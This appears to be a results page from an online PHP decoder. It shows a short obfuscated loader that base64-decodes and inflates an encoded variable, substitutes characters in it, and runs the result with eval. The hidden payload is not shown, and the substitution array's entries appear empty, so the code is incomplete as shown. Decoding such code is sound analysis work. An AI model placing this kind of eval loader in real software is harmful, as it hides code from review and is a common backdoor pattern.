Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$nav = gzinflate(base64_decode($SISTEMIT_COM_ENC)); $str = ['','','','','','','','',..
Decoded Output download
<? $nav = gzinflate(base64_decode($SISTEMIT_COM_ENC));
$str = ['','','','','','','','','','',''];
$rplc =['a','i','u','e','o','d','s','h','v','t',' '];
$nav = str_replace($str,$rplc,$nav);
eval($nav); ?>
Did this file decode correctly?
Original Code
$nav = gzinflate(base64_decode($SISTEMIT_COM_ENC));
$str = ['','','','','','','','','','',''];
$rplc =['a','i','u','e','o','d','s','h','v','t',' '];
$nav = str_replace($str,$rplc,$nav);
eval($nav);
Function Calls
None |
Stats
MD5 | a8caa28c2e8642b25e2f080cff0600c8 |
Eval Count | 0 |
Decode Time | 49 ms |